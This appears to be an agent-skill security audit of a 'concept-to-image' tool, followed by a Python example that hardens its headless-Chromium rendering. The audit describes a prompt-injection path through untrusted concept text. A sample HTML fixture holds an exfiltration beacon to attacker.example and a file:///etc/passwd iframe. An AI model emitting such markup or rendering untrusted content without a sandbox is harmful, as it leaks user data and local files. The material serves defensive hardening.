concept-to-image

Pass

Audited by Gen Agent Trust Hub on Apr 16, 2026

Risk Level: SAFE
Finding categories: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill's core workflow relies on executing a local Python script, scripts/render_to_image.py, via a shell command to perform the image rendering. The script launches a headless Chromium browser with the --no-sandbox flag, which disables Chromium's process sandbox and so weakens the isolation between the rendered content and the host it runs on.
  • [EXTERNAL_DOWNLOADS]: The skill's documentation and error-handling instructions direct the user or agent to download and install external software, specifically the playwright package and a Chromium browser binary, from public registries.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection: it takes untrusted user input (the "concept") and uses it to generate HTML, which is then rendered by a headless browser.
  • Ingestion points: User concept prompts processed in SKILL.md (Step 1).
  • Boundary markers: None present; the AI is instructed to design HTML directly from user descriptions.
  • Capability inventory: Execution of scripts/render_to_image.py (shell access) and browser rendering via Playwright (network and file system access within the browser context).
  • Sanitization: No sanitization or validation of the user-provided concept is mentioned before it is used to generate executable HTML/SVG code.
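As an added example (not part of the audited skill and not taken from the auditor's report), the Python below sketches a render path that answers the three findings above: it refuses --no-sandbox at launch, denies every fetch the generated markup attempts except about: and data: URLs, disables script execution, and lists the external references in the markup before a browser is ever started. The function and constant names, the constructed sample markup and the specific Playwright settings are this example's own assumptions; the skill's real scripts/render_to_image.py is not shown on the page.

```python
"""Added example: render LLM-generated HTML/SVG to an image without letting it
reach the network, the local file system or the host outside the sandbox."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Chromium flags that remove the isolation the audit relies on. --no-sandbox is
# the one named in the finding; the other two are often added next to it.
UNSAFE_CHROMIUM_ARGS = frozenset({
    "--no-sandbox",
    "--disable-web-security",
    "--allow-file-access-from-files",
})

# Schemes a static HTML/SVG render legitimately needs. http(s), ws(s), file,
# blob and everything else are denied, so the markup cannot exfiltrate the
# concept text or read local files via <img>, <iframe>, <link>, CSS url(), ...
ALLOWED_SCHEMES = frozenset({"about", "data"})

# Attributes through which markup pulls in sub-resources or navigates.
URL_ATTRIBUTES = frozenset({"src", "href", "xlink:href", "data", "poster", "action"})


def check_launch_args(args):
    """Refuse a Chromium launch that disables process isolation."""
    bad = sorted(UNSAFE_CHROMIUM_ARGS & {a.split("=", 1)[0] for a in args})
    if bad:
        raise ValueError("refusing unsafe Chromium flags: " + ", ".join(bad))
    return list(args)


def classify_request(url):
    """'allow' only for schemes that never leave the renderer; else 'block'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return "allow" if scheme in ALLOWED_SCHEMES else "block"


class _RefCollector(HTMLParser):
    """Collects (tag, url, verdict) for every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRIBUTES and value:
                self.refs.append((tag, value, classify_request(value)))


def external_references(html):
    """Pre-render check: what the markup would fetch, with the verdict for each.

    Useful as a log line, or as a hard stop before the browser is started."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    return parser.refs


def render_concept_html(html, out_path, args=()):
    """Render to PNG with the sandbox on, scripts off and all fetches denied.

    Real run only: Playwright is imported lazily so the checks above work
    without a browser installed (pip install playwright; playwright install
    chromium)."""
    from playwright.sync_api import sync_playwright

    def gate(route):
        # Every request the page makes passes through the scheme allow-list.
        if classify_request(route.request.url) == "allow":
            route.continue_()
        else:
            route.abort()

    with sync_playwright() as p:
        # Default launch keeps Chromium's sandbox; check_launch_args rejects
        # any attempt to pass --no-sandbox through.
        browser = p.chromium.launch(headless=True, args=check_launch_args(args))
        context = browser.new_context(
            offline=True,               # browser believes it has no network
            java_script_enabled=False,  # generated markup cannot run scripts
            viewport={"width": 1200, "height": 800},
        )
        context.route("**/*", gate)
        page = context.new_page()
        page.set_content(html, wait_until="load")
        page.screenshot(path=out_path, full_page=True)
        browser.close()
    return out_path


# Constructed sample of what a poisoned "concept" could steer the model into
# emitting: an exfiltration beacon, a local-file frame and a harmless inline image.
SAMPLE_GENERATED_HTML = """<!doctype html><html><body>
<h1>Concept: a calm blue gradient</h1>
<img src="https://attacker.example/beacon?c=calm%20blue%20gradient">
<iframe src="file:///etc/passwd"></iframe>
<img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg'/%3E">
</body></html>"""

if __name__ == "__main__":
    for tag, url, verdict in external_references(SAMPLE_GENERATED_HTML):
        print(f"{verdict:5} <{tag}> {url}")
    render_concept_html(SAMPLE_GENERATED_HTML, "concept.png")
```

Two caveats on the design. First, --no-sandbox is usually added because Chromium refuses to start as root; the fix is to run the renderer as an unprivileged user (or inside a container that is itself sandboxed), not to pass the flag. Second, java_script_enabled=False is the right default for a static design render, but if the skill's designs depend on scripts you would turn it back on and rely on the route gate and offline mode to keep any script from reaching the network.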
Audit Metadata
Risk Level: SAFE
Analyzed: Apr 16, 2026, 11:33 AM